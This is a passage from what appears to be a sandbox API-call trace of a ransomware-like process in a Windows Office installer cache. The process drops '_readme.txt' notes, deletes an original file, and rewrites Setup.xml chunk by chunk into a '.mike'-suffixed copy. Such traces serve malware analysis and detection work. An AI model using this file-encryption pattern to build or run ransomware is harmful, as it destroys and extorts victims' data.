ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3341000, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3341000, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x12e0)) returned 1 [0041.946] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.946] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1 [0041.946] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.946] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0041.947] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.947] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.948] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpFilePart=0x0) returned 0x4d [0041.948] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.948] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.948] GetFileType (hFile=0x264) returned 0x1 [0041.948] GetFileType (hFile=0x264) returned 0x1 [0041.948] WriteFile (in: hFile=0x264, lpBuffer=0x2191e10*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2191e10*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.949] CloseHandle (hObject=0x264) returned 1 [0041.949] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe", lpFilePart=0x0) returned 0x46 [0041.949] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll", lpFilePart=0x0) returned 0x49 [0041.949] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpFilePart=0x0) returned 0x4b [0041.949] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpFilePart=0x0) returned 0x4a [0041.950] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpFilePart=0x0) returned 0x57 [0041.950] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe", lpFilePart=0x0) returned 0x48 [0041.950] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.950] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.950] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.950] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.950] GetFileType (hFile=0x264) returned 0x1 [0041.950] GetFileType (hFile=0x264) returned 0x1 [0041.950] CloseHandle (hObject=0x264) returned 1 [0041.950] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.950] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.950] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.950] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.951] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a0d2c | out: lpFileInformation=0x21a0d2c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061)) returned 1 [0041.951] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.951] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a1048 | out: lpFileInformation=0x21a1048*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061)) returned 1 [0041.951] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.951] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.951] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.951] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.951] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.952] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.952] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.952] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.952] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.952] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.952] GetFileType (hFile=0x264) returned 0x1 [0041.952] GetFileType (hFile=0x264) returned 0x1 [0041.952] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.952] WriteFile (in: hFile=0x264, lpBuffer=0x21a1ec4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21a1ec4*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.953] CloseHandle (hObject=0x264) returned 1 [0041.953] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a19cc | out: lpFileInformation=0x21a19cc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061)) returned 1 [0041.953] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.954] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.954] GetFileType (hFile=0x264) returned 0x1 [0041.954] GetFileType (hFile=0x264) returned 0x1 [0041.954] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.954] ReadFile (in: hFile=0x264, lpBuffer=0x21a2fec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21a2fec*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.956] CloseHandle (hObject=0x264) returned 1 [0041.957] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.957] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.957] GetFileType (hFile=0x264) returned 0x1 [0041.957] GetFileType (hFile=0x264) returned 0x1 [0041.957] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.957] WriteFile (in: hFile=0x264, lpBuffer=0x21ad554*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21ad554*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.958] CloseHandle (hObject=0x264) returned 1 [0041.958] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.959] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.959] GetFileType (hFile=0x264) returned 0x1 [0041.959] GetFileType (hFile=0x264) returned 0x1 [0041.959] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x2800 [0041.959] ReadFile (in: hFile=0x264, lpBuffer=0x21affac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21affac*, lpNumberOfBytesRead=0x2af110*=0x2800, lpOverlapped=0x0) returned 1 [0041.959] CloseHandle (hObject=0x264) returned 1 [0041.960] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.960] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.960] GetFileType (hFile=0x264) returned 0x1 [0041.960] GetFileType (hFile=0x264) returned 0x1 [0041.960] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2a20 [0041.960] WriteFile (in: hFile=0x264, lpBuffer=0x21ba514*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21ba514*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0041.960] CloseHandle (hObject=0x264) returned 1 [0041.961] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.961] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.961] GetFileType (hFile=0x264) returned 0x1 [0041.961] GetFileType (hFile=0x264) returned 0x1 [0041.961] ReadFile (in: hFile=0x264, lpBuffer=0x21bcf6c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21bcf6c*, lpNumberOfBytesRead=0x2af110*=0x61, lpOverlapped=0x0) returned 1 [0041.961] CloseHandle (hObject=0x264) returned 1 [0041.962] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.962] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.962] GetFileType (hFile=0x264) returned 0x1 [0041.962] GetFileType (hFile=0x264) returned 0x1 [0041.962] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x5220 [0041.962] WriteFile (in: hFile=0x264, lpBuffer=0x21c0070*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21c0070*, lpNumberOfBytesWritten=0x2af104*=0x70, lpOverlapped=0x0) returned 1 [0041.962] CloseHandle (hObject=0x264) returned 1 [0041.963] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.963] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.963] GetFileType (hFile=0x264) returned 0x1 [0041.963] GetFileType (hFile=0x264) returned 0x1 [0041.964] WriteFile (in: hFile=0x264, lpBuffer=0x21c3298*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21c3298*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.964] CloseHandle (hObject=0x264) returned 1 [0041.965] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.965] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0041.965] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.965] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3367160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe3367160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3367160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x5290)) returned 1 [0041.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.965] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0041.965] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All 